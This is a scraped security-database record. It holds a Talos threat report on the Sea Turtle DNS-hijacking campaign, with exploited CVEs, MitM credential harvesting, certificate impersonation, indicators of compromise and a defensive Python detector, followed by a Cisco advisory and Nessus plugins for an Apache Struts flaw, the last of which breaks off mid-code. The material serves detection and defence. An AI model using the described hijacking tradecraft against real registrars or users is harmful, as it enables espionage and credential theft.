[Diagram](<http://2.bp.blogspot.com/-FQg4Ak28yDc/XLdL-8NlekI/AAAAAAAAAXw/wDpJRiXAEGEzPJo9bQ9PxqOG8rcGn6gWACK4BGAYYCw/s1600/DNSpionage-methodology-v2.png>)

### Operational tradecraft

#### Initial access

The threat actors behind the Sea Turtle campaign gained initial access either by exploiting known vulnerabilities or by sending spear-phishing emails. Talos believes that the threat actors have exploited multiple known CVEs to either gain initial access or to move laterally within an affected organization. Based on our research, we know the actor utilizes the following known exploits:

 * [CVE-2009-1151](<https://nvd.nist.gov/vuln/detail/CVE-2009-1151>): PHP code injection vulnerability affecting phpMyAdmin
 * [CVE-2014-6271](<https://nvd.nist.gov/vuln/detail/CVE-2014-6271>): RCE affecting GNU bash system, specifically the SMTP (this was part of the [Shellshock](<https://www.us-cert.gov/ncas/alerts/TA14-268A>) CVEs)
 * [CVE-2017-3881](<https://nvd.nist.gov/vuln/detail/CVE-2017-3881>): RCE by unauthenticated user with elevated privileges on Cisco switches
 * [CVE-2017-6736](<https://nvd.nist.gov/vuln/detail/CVE-2017-6736>): Remote Code Exploit (RCE) for Cisco Integrated Services Router 2811
 * [CVE-2017-12617](<https://nvd.nist.gov/vuln/detail/CVE-2017-12617>): RCE affecting Apache web servers running Tomcat
 * [CVE-2018-0296](<https://nvd.nist.gov/vuln/detail/CVE-2018-0296>): Directory traversal allowing unauthorized access to Cisco Adaptive Security Appliances (ASAs) and firewalls
 * [CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>): RCE for websites built with Drupal, aka "Drupalgeddon"

As of early 2019, the only evidence of the spear-phishing threat vector came from a compromised organization's public disclosure. On January 4, Packet Clearing House, which is not an Internet exchange point but rather an NGO that provides support to Internet exchange points and the core of the domain name system, provided confirmation of this aspect of the actors' tactics when it publicly revealed its internal DNS had been briefly hijacked as a consequence of the compromise at its domain registrar.

As with any initial access involving a sophisticated actor, we believe this list of CVEs to be incomplete. The actor in question can leverage known vulnerabilities as they encounter a new threat surface. This list only represents the observed behavior of the actor, not their complete capabilities.
\n\n\n### Globalized DNS hijacking activity as an infection vector\n\nDuring a typical incident, the actor would modify the NS records for the targeted organization, pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries. The amount of time that the targeted DNS record was hijacked can range from a couple of minutes to a couple of days. This type of activity could give an attacker the ability to redirect any victim who queried for that particular domain around the world. [Other cybersecurity firms](<https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/>) previously reported some aspects of this activity. Once the actor-controlled name server was queried for the targeted domain, it would respond with a falsified \"A\" record that would provide the IP address of the actor-controlled MitM node instead of the IP address of the legitimate service. In some instances, the threat actors modified the time-to-live (TTL) value to one second. This was likely done to minimize the risk of any records remaining in the DNS cache of the victim machine. \n \nDuring 2019, we observe the following name servers being used in support of the Sea Turtle campaign: \n \n\n\n \n\n\n \n\n\nDomain\n\n| \n\nActive Timeframe \n \n---|--- \n \nns1[.]intersecdns[.]com\n\n| \n\nMarch - April 2019 \n \nns2[.]intersecdns[.]com\n\n| \n\nMarch - April 2019 \n \nns1[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n \nns2[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n \n \n\n\n \n\n\n### Credential harvesting: Man-in-the-middle servers\n\nOnce the threat actors accessed a domain's DNS records, the next step was to set up a man-in-the-middle (MitM) framework on an actor-controlled server. \n \nThe next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials. Once these credentials were captured, the user would then be passed to the legitimate service. 
to evade detection, the actors performed \"certificate impersonation,\" a technique in which the attacker obtained a certificate authority-signed X.509 certificate from another provider for the same domain imitating the one already used by the targeted organization. For example, if a DigiCert certificate protected a website, the threat actors would obtain a certificate for the same domain but from another provider, such as Let's Encrypt or Comodo. This tactic would make detecting the MitM attack more difficult, as a user's web browser would still display the expected \"SSL padlock\" in the URL bar. \n \nWhen the victim entered their password into the attacker's spoofed webpage, the actor would capture these credentials for future use. The only indication a victim received was a brief lag between when the user entered their information and when they obtained access to the service. This would also leave almost no evidence for network defenders to discover, as legitimate network credentials were used to access the accounts. \n \nIn addition to the MitM server IP addresses published in previous reports, Talos identified 16 additional servers leveraged by the actor during the observed attacks. The complete list of known malicious IP addresses are in the Indicators of Compromise (IOC) section below. \n\n\n### Credential harvesting with compromised SSL certificates\n\nOnce the threat actors appeared to have access to the network, they stole the organization's SSL certificate. The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials. This allowed the actors to expand their access into the targeted organization's network. The stolen certificates were typically only used for less than one day, likely as an operational security measure. Using stolen certificates for an extended period would increase the likelihood of detection. 
In some cases, the victims were redirected to these actor-controlled servers displaying the stolen certificate. \n \nOne notable aspect of the campaign was the actors' ability to impersonate VPN applications, such as Cisco Adaptive Security Appliance (ASA) products, to perform MitM attacks. At this time, we do not believe that the attackers found a new ASA exploit. Rather, they likely abused the trust relationship associated with the ASA's SSL certificate to harvest VPN credentials to gain remote access to the victim's network. This MitM capability would allow the threat actors to harvest additional VPN credentials. \n \nAs an example, DNS records indicate that a targeted domain resolved to an actor-controlled MitM server. The following day, Talos identified an SSL certificate with the subject common name of \"ASA Temporary Self Signed Certificate\" associated with the aforementioned IP address. This certificate was observed on both the actor-controlled IP address and on an IP address correlated with the victim organization. \n \nIn another case, the attackers were able to compromise NetNod, a non-profit, independent internet infrastructure organization based in Sweden. NetNod acknowledged the compromise in a [public statement](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) on February 5, 2019. Using this access, the threat actors were able to manipulate the DNS records for sa1[.]dnsnode[.]net. This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa). It is likely that there are additional Saudi Arabia-based victims from this attack. \n \nIn one of the more recent campaigns on March 27, 2019, the threat actors targeted the Sweden-based consulting firm Cafax. On Cafax's [public webpage](<http://www.cafax.se/Home.html>), the company states that one of their consultants actively manages the i[.]root-server[.]net zone. 
NetNod managed this particular DNS server zone. We assess with high confidence that this organization was targeted in an attempt to re-establish access to the NetNod network, which this threat actor had previously compromised. \n\n\n### Primary and secondary victims\n\nWe identified 40 different organizations that were targeted during this campaign. The victim organizations fall broadly into two categories. The first group, which we refer to as primary victims, were almost entirely located in the Middle East and North Africa. Examples of organizations that were compromised include: \n\n\n * Ministries of foreign affairs\n * Military organizations\n * Intelligence agencies\n * Prominent energy organizations\n \nThe second cluster of victim organizations were likely compromised to enable access to these primary targets. These organizations were located around the world, though mostly concentrated in the Middle East and North Africa. Examples include: \n\n\n * Telecommunications organizations\n * Internet service providers\n * Information technology firms\n * Registrars\n * One registry\n \nNotably, the threat actors were able to gain access to registrars that manage ccTLDs for Amnic, which is listed as the technical contact on [IANA](<https://www.iana.org/domains/root/db/am.html>) for the ccTLD .am. Access to these ccTLD registrars would have allowed the attackers to hijack any domain under those ccTLDs. \n\n\n### How is this tradecraft different?\n\nThe threat actors behind the Sea Turtle campaign have proven to be highly capable: they have performed operations for over two years and have been undeterred by public reports documenting various aspects of their activity. 
This cyber threat campaign represents the first known case of a domain name registry organization being compromised for cyber espionage operations. \n \nTo distinguish this activity from previous reporting on other attackers, such as those affiliated with DNSpionage, below is a list of traits that are unique to the threat actors behind the Sea Turtle campaign: \n\n\n * These actors perform DNS hijacking through the use of actor-controlled name servers.\n * These actors have been more aggressive in targeting DNS registries and a number of registrars, including those that manage ccTLDs.\n * These actors use Let's Encrypt, Comodo, Sectigo, and self-signed certificates on their MitM servers to gain the initial round of credentials.\n * Once they have access to the network, they steal the organization's legitimate SSL certificate and use it on actor-controlled servers.\n\n### Why was it so successful?\n\nWe believe that the Sea Turtle campaign continues to be highly successful for several reasons. First, the actors employ a unique approach to gain access to the targeted networks. Most traditional security products, such as IDS and IPS systems, are not designed to monitor and log DNS requests. The threat actors were able to achieve this level of success because security was added to the domain name system as an afterthought. Had more ccTLDs implemented security features such as registrar locks, the attackers would not have been able to redirect the targeted domains. \n \nThe threat actors also used an interesting technique called certificate impersonation. This technique was successful in part because a domain-validated certificate proves only that the requester controlled the domain at the time of issuance; it says nothing about who should legitimately control it. Once the actors had hijacked a domain's DNS, any public CA would issue them a valid certificate for it, and the browser padlock gave users no hint that anything was wrong. The attackers also stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials, allowing the actors to gain access to the targeted network. 
\n \nThe threat actors were able to maintain long-term persistent access to many of these networks by utilizing compromised credentials. \n \nWe will continue to monitor Sea Turtle and work with our partners to understand the threat as it continues to evolve, to ensure that our customers remain protected and the public is informed. \n \n\n\n### Mitigation strategy\n\nTo best protect against this type of attack, we compiled a list of potential actions. Talos suggests using a registry lock service, which will require an out-of-band confirmation before any changes can be made to an organization's DNS records. If your registrar does not offer a registry lock service, we recommend implementing multi-factor authentication, such as [DUO](<https://www.cisco.com/c/en/us/products/security/adaptive-multi-factor-authentication.html>), for access to your organization's DNS records. If you suspect you were targeted by this type of intrusion, we recommend instituting a network-wide password reset, preferably from a computer on a trusted network. Lastly, we recommend applying patches, especially on internet-facing machines. Network administrators can monitor passive DNS records for their domains to check for abnormalities, and, since public CAs log the certificates they issue to Certificate Transparency, can watch those logs for certificates for their domains that they never requested. 
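The last recommendation above, watching passive DNS for your own domains, is easy to turn into a concrete check. The Python below is an added example rather than code from the Talos post. It keeps a baseline of what an organization knows about its own domain (authoritative name servers, addresses, the CA it buys certificates from, and its certificate fingerprints) and diffs incoming observations against it, raising one alert type for each Sea Turtle technique described in this post: a delegation change to an unknown name server, a certificate for the name from a CA the organization never used, and the organization's own certificate being presented by a host outside its address space. The victim domain example.org, its baseline and the timestamps are hypothetical; the attacker name server ns1.intersecdns.com and the address 95.179.150.101 are taken from the IOC tables in this post (written defanged there). In production the record lists would be fed from a passive-DNS provider and a Certificate Transparency monitor instead of the constructed lists embedded here.

```python
"""Baseline-diff detection for the Sea Turtle tradecraft described above: DNS
hijacking through actor-controlled name servers, certificate impersonation (a
valid certificate for the victim's name from a CA the victim never used), and
a stolen legitimate certificate served from an actor-controlled host.

Added example, not code from the Talos post. All inputs are constructed inline:
the victim domain example.org, its baseline and the timestamps are hypothetical;
the attacker name server ns1.intersecdns.com and IP 95.179.150.101 come from the
IOC tables in this post (written defanged there)."""
from dataclasses import dataclass
from typing import Iterable, List


@dataclass(frozen=True)
class DnsRecord:
    observed: str    # ISO-8601 timestamp of the passive-DNS observation
    name: str
    rrtype: str      # "NS" or "A"
    rdata: str


@dataclass(frozen=True)
class CertObservation:
    observed: str
    name: str         # host name the certificate was presented for
    issuer: str       # issuing CA organisation
    sha256: str       # leaf certificate fingerprint
    served_from: str  # IP address that presented the certificate


# Hypothetical baseline an organisation would record for its own domain.
BASELINE = {
    "domain": "example.org",
    "ns": {"ns1.example-dns.net", "ns2.example-dns.net"},
    "a": {"203.0.113.10"},
    "cert_issuers": {"DigiCert Inc"},
    "cert_fingerprints": {"aa" * 32},
}


def dns_alerts(baseline: dict, records: Iterable[DnsRecord]) -> List[str]:
    """Flag NS or A records for the baseline domain outside the expected sets.
    A delegation change to an unknown name server is the strongest signal,
    since that is how the victims' traffic was redirected to MitM servers."""
    alerts = []
    for r in records:
        if r.name != baseline["domain"]:
            continue
        if r.rrtype == "NS" and r.rdata not in baseline["ns"]:
            alerts.append(f"{r.observed} NS delegation changed to {r.rdata}")
        elif r.rrtype == "A" and r.rdata not in baseline["a"]:
            alerts.append(f"{r.observed} A record points to {r.rdata}")
    return alerts


def cert_alerts(baseline: dict, certs: Iterable[CertObservation]) -> List[str]:
    """Flag certificate presentations the organisation did not arrange:
    - an issuer it never used, or an unknown fingerprint (certificate impersonation);
    - its own certificate presented by a host outside its address space
      (a stolen certificate on an actor-controlled server)."""
    alerts = []
    for c in certs:
        if c.name != baseline["domain"]:
            continue
        known_cert = c.sha256 in baseline["cert_fingerprints"]
        if c.issuer not in baseline["cert_issuers"] or not known_cert:
            alerts.append(f"{c.observed} impersonation: cert from {c.issuer} "
                          f"({c.sha256[:16]}...) presented by {c.served_from}")
        elif c.served_from not in baseline["a"]:
            alerts.append(f"{c.observed} stolen cert: legitimate fingerprint "
                          f"presented by unexpected host {c.served_from}")
    return alerts


# Constructed observations; the attacker values come from this post's IOC tables.
DNS_OBSERVATIONS = [
    DnsRecord("2019-03-26T09:00:00Z", "example.org", "NS", "ns1.example-dns.net"),
    DnsRecord("2019-03-27T02:10:00Z", "example.org", "NS", "ns1.intersecdns.com"),
    DnsRecord("2019-03-27T02:12:00Z", "example.org", "A", "95.179.150.101"),
    DnsRecord("2019-03-27T02:12:00Z", "other.example", "A", "95.179.150.101"),  # not ours
]
CERT_OBSERVATIONS = [
    CertObservation("2019-03-26T09:00:00Z", "example.org", "DigiCert Inc", "aa" * 32, "203.0.113.10"),
    CertObservation("2019-03-27T02:15:00Z", "example.org", "Let's Encrypt", "bb" * 32, "95.179.150.101"),
    CertObservation("2019-03-27T20:00:00Z", "example.org", "DigiCert Inc", "aa" * 32, "95.179.150.101"),
]


def run_example() -> dict:
    """Run both detectors over the constructed observations."""
    return {"dns": dns_alerts(BASELINE, DNS_OBSERVATIONS),
            "cert": cert_alerts(BASELINE, CERT_OBSERVATIONS)}


if __name__ == "__main__":
    for kind, alerts in run_example().items():
        for alert in alerts:
            print(f"[{kind}] {alert}")
```

A stolen legitimate certificate cannot be caught by an issuer or fingerprint check, since both match the baseline; the only observable difference is the host presenting it, which is why the certificate observations carry the serving address. Registry lock and MFA on the registrar account stop the delegation change in the first place; this kind of monitoring is what tells you when they were not enough.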
\n \n\n\n### Coverage\n\nCVE-2009-1151: PHP code injection vulnerability affecting phpMyAdmin \nSID: [2281](<https://snort.org/rule_docs/1-2281>) \n \nCVE-2014-6271: RCE affecting GNU Bash, specifically via SMTP (part of the Shellshock CVEs) \nSID: [31975](<https://snort.org/rule_docs/1-31975>) \\- [31978](<https://snort.org/rule_docs/1-31978>), [31985](<https://snort.org/rule_docs/1-31985>), [32038](<https://snort.org/rule_docs/1-32038>), [32039](<https://snort.org/rule_docs/1-32039>), [32041](<https://snort.org/rule_docs/1-32041>) \\- [32043](<https://snort.org/rule_docs/1-32043>), [32069](<https://snort.org/rule_docs/1-32069>), [32335](<https://snort.org/rule_docs/1-32335>), [32336](<https://snort.org/rule_docs/1-32336>) \n \nCVE-2017-3881: RCE for Cisco switches \nSID: [41909](<https://snort.org/rule_docs/1-41909>) \\- [41910](<https://snort.org/rule_docs/1-41910>) \n \nCVE-2017-6736: Remote code execution (RCE) for the Cisco Integrated Services Router 2811 \nSID: [43424](<https://snort.org/rule_docs/3-43424>) \\- [43432](<https://snort.org/rule_docs/3-43432>) \n \nCVE-2017-12617: RCE affecting Apache Tomcat servers \nSID: [44531](<https://snort.org/rule_docs/1-44531>) \n \nCVE-2018-0296: Directory traversal to gain unauthorized access to Cisco Adaptive Security Appliances (ASAs) and Firewalls \nSID: 46897 \n \nCVE-2018-7600: RCE for websites built with Drupal, aka \"Drupalgeddon 2\" \nSID: [46316](<https://snort.org/rule_docs/1-46316>) \n\n\n### Indicators of Compromise\n\nThe threat actors utilized leased IP addresses from organizations that offer virtual private server (VPS) services. These VPS providers have since resold many of these IP addresses to various benign customers. To help network defenders, we have included each IP address along with the month(s) in which it was associated with the threat actor. 
\n \n**IP address** | **Month** | **Year** | **Country of targets**\n---|---|---|---\n199.247.3.191 | November | 2018 | Albania, Iraq\n37.139.11.155 | November | 2018 | Albania, UAE\n185.15.247.140 | January | 2018 | Albania\n206.221.184.133 | November | 2018 | Egypt\n188.166.119.57 | November | 2018 | Egypt\n185.42.137.89 | November | 2018 | Albania\n82.196.8.43 | October | 2018 | Iraq\n159.89.101.204 | December - January | 2018-2019 | Turkey, Sweden, Syria, Armenia, US\n146.185.145.202 | March | 2018 | Armenia\n178.62.218.244 | December - January | 2018-2019 | UAE, Cyprus\n139.162.144.139 | December | 2018 | Jordan\n142.54.179.69 | January - February | 2017 | Jordan\n193.37.213.61 | December | 2018 | Cyprus\n108.61.123.149 | February | 2019 | Cyprus\n212.32.235.160 | September | 2018 | Iraq\n198.211.120.186 | September | 2018 | Iraq\n146.185.143.158 | September | 2018 | Iraq\n146.185.133.141 | October | 2018 | Libya\n185.203.116.116 | May | 2018 | UAE\n95.179.150.92 | November | 2018 | UAE\n174.138.0.113 | September | 2018 | UAE\n128.199.50.175 | September | 2018 | UAE\n139.59.134.216 | July - December | 2018 | United States, Lebanon\n45.77.137.65 | March - April | 2019 | Syria, Sweden\n142.54.164.189 | March - April | 2019 | Syria\n199.247.17.221 | March | 2019 | Sweden\n
\n\n\nThe following list contains the threat actor name server domains and their IP addresses.\n\nDomain | Active Timeframe | IP address\n---|---|---\nns1[.]intersecdns[.]com | March - April 2019 | 95.179.150.101\nns2[.]intersecdns[.]com | March - April 2019 | 95.179.150.101\nns1[.]lcjcomputing[.]com | January 2019 | 95.179.150.101\nns2[.]lcjcomputing[.]com | January 2019 | 95.179.150.101\n", "cvss3": {}, "published": "2019-04-18T16:08:25", "type": "talosblog", "title": "DNS Hijacking Abuses Trust In Core Internet Service", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2009-1151", "CVE-2014-6271", "CVE-2017-12617", "CVE-2017-3881", "CVE-2017-6736", "CVE-2018-0296", "CVE-2018-7600"], "modified": "2019-04-18T16:08:25", "id": "TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/GSxJP9GzlhI/seaturtle.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisco": [{"lastseen": "2023-06-24T08:38:32", "description": "A vulnerability in Apache Struts could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system.\n\nThe vulnerability exists because the affected software insufficiently validates user-supplied input, allowing the use of results with no namespace value and the use of url tags with no value or action. In cases where upper actions or configurations also have no namespace or a wildcard namespace, an attacker could exploit this vulnerability by sending a request that submits malicious input to the affected application for processing. 
If successful, the attacker could execute arbitrary code in the security context of the affected application on the targeted system.\nThe following Snort rules can be used to detect possible exploitation of this vulnerability: Snort SID 29639, 39190, 39191, and 47634\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\"]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-23T20:00:00", "type": "cisco", "title": "Apache Struts Remote Code Execution Vulnerability Affecting Cisco Products: August 2018", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-17T18:52:00", "id": "CISCO-SA-20180823-APACHE-STRUTS", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-20T14:39:40", 
"description": "The version of Apache Struts running on the remote host is 2.3.x prior to 2.3.35, or 2.5.x prior to 2.5.17. It, therefore, contains a possible remote code execution vulnerability when results are used without setting a namespace along with an upper action that does not have a namespace set or has a wildcard namespace set.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-08-22T00:00:00", "type": "nessus", "title": "Apache Struts CVE-2018-11776 Results With No Namespace Possible Remote Code Execution (S2-057)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_17.NASL", "href": "https://www.tenable.com/plugins/nessus/112036", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112036);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts CVE-2018-11776 Results With No Namespace Possible Remote Code Execution (S2-057)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by a possible remote code execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.x\nprior to 2.3.35, or 2.5.x prior to 2.5.17. 
It, therefore, contains a\npossible remote code execution vulnerability when results are used\nwithout setting a namespace along with an upper action that does not\nhave a namespace set or has a wildcard namespace set.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2018/Aug/46\");\n script_set_attribute(attribute:\"see_also\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/22\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.3\", \"max_version\" : \"2.3.34\", \"fixed_version\" : \"2.3.35\" },\n { \"min_version\" : \"2.5\", \"max_version\" : \"2.5.16\", \"fixed_version\" : \"2.5.17\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-18T15:45:00", "description": "The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the handling of results with no namespace set. 
An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.", "cvss3": {}, "published": "2018-08-23T00:00:00", "type": "nessus", "title": "Apache Struts CVE-2018-11776 Results With No Namespace Remote Code Execution (S2-057) (remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2023-07-17T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_17_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/112064", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112064);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/17\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts CVE-2018-11776 Results With No Namespace Remote Code Execution (S2-057) (remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is affected by\na remote code execution vulnerability in the handling of results with\nno namespace set. 
An unauthenticated, remote attacker can exploit this,\nvia a specially crafted HTTP request, to potentially execute arbitrary\ncode, subject to the privileges of the web server user.\");\n # https://www.tenable.com/blog/new-apache-struts-vulnerability-could-allow-for-remote-code-execution\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a21304a0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2018/Aug/46\");\n script_set_attribute(attribute:\"see_also\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.35 / 2.5.17 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", 
value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach var cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if 